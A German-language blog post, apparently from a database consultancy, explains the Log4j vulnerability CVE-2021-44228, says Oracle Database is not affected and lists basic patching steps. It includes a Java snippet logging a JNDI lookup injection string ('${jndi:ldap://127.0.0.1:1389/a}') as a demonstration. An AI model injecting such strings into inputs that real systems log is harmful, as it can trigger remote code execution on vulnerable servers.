Sicherheitslücke in Apache Log4j (CVE-2021-44228)

Am letzten Wochenende, wurde während der Zero-Day-Schwachstellen eine Sicherheitslücke in Apache Log4j entdeckt, die viele Programme und Anwendungen betrifft. Die Sicherheitslücke in Apache Log4j hat auf einer Skala von 1 bis 10, die Stufe 10 erreicht und dazu geführt, dass das Bundesamt für Sicherheit in der Informationstechnik (BSI) seine Warnstufe auf Rot hochgesetzt hat. Zahlreiche Unternehmen und Behörden sind bereits von dieser Schwachstelle betroffen. Besonders die, die aus dem Internet zugreifbar sind.

Was ist “Apache Log4j”?

Apache Log4j ist eine beliebte Protokollierungsbibliothek für Java-Anwendungen. Sie dient der performanten Aggregation von Protokolldaten innerhalb einer Anwendung. Dabei lassen sich beispielsweise verschiedene Log-Level einstellen. Apache Log4j ist ein umfangreiches Open-Source Programm das von vielen anderen Anwendungen verwendet wird.

Was die Sicherheitslücke in Apache Log4j mit der Bezeichnung CVE-2021-44228 ist und wie die Angreifer Ihr System Übernehmen, erklären wir im nächsten Schritt.

CVE-2021-44228

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {
       private static final Logger logger = LogManager.getLogger(log4j.class);
       public static void main(String[] args) {
              logger.error("${jndi:ldap://127.0.0.1:1389/a}");
                   }
}

Mit dieser Sicherheitslücke in Apache Log4j lässt sich beliebiger Java-Code in Programmen einschleusen, die eine verwundbare Version von Apache Log4j einsetzen. Es ermöglicht in den Versionen 2.0 bis 2.14.1, Angreifern gegebenenfalls auf dem Zielsystem eigenen Programmcode auszuführen und so den Server zu kompromittieren. Dadurch kann ein Angreifer sich über das Netzwerk auf der Datenbank ohne Authentifizierung anzumelden. Diese Gefahr besteht dann, wenn log4j verwendet wird, um eine vom Angreifer kontrollierte Zeichenkette wie beispielsweise den HTTP User Agent zu protokollieren.

Weitere Informationen finden Sie hier.

Ist die Oracle Datenbank davon betroffen ?

Die Oracle Datenbank ist momentan von der Sicherheitslücke in Apache Log4j mit der Bezeichnung CVE-2021-44228 nicht betroffen!!!

Die Oracle Sicherheitsteams haben bereits diese Sicherheitswarnung sowie alle relevanten Sicherheitsmaßnahmen von Drittanbietern evaluiert. Es ist trotzdem empfehlenswert die neuesten Sicherheitspatches einzuspielen, sobald sie verfügbar sind.

Allerdings können weiterhin Systeme anderer Hersteller von der Schwachstelle betroffen sein!!!

Dabei arbeiten Sicherheitsspezialisten auf der ganzen Welt daran, verwundbare Systeme zu identifizieren und die gefundenen Lücken zu schließen.

Schutzmaßnahmen

  1. Prüfen Sie Ihre Systeme auf die verwendeten Log4J Versionen
  2. Installieren Sie die neueste Sicherheitspatche
  3. Planen Sie Quartalsweise Updates ein

Bringen Sie Ihre Systeme auf dem neuesten Stand, in dem Sie regelmäßige Updates einspielen.

Dafür sind wir als Datenbankexperten für Sie da – Sprechen Sie uns unverbindlich an !